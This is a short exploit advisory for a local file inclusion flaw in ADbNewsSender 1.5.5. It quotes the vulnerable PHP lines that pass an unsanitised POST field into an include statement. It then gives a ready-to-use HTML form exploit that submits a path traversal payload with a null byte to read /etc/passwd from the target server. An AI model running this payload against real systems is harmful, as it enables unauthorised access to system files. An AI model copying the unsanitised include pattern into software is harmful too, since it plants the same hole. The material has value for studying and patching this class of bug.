##########################################
##   Exploit found by KillaWho | wh0    ##
##        MSN: admin@x-pl0it.net        ##
##########################################

# Title: ADbNewsSender 1.5.5 LFI
# Src: http://adbnewssender.sourceforge.net



## VULN ##

File: maillinglist/setup/step1.php.inc

Line: 33
$path_to_lang=$_POST['path_to_lang'];

35:
include "../config/$path_to_lang/lang-setup.php.inc";


## Exploit (exploit.html) ##
<html>
<form action="http://www.example.com/ADbNewsSender%201.5.5/setup/index.php" method=post>
<input type="text" name="path_to_lang" value="../../../../../etc/passwd%00">
<input type="hidden" name="step" value="2">
<input type=submit value="Exploit!">
</form>
</html>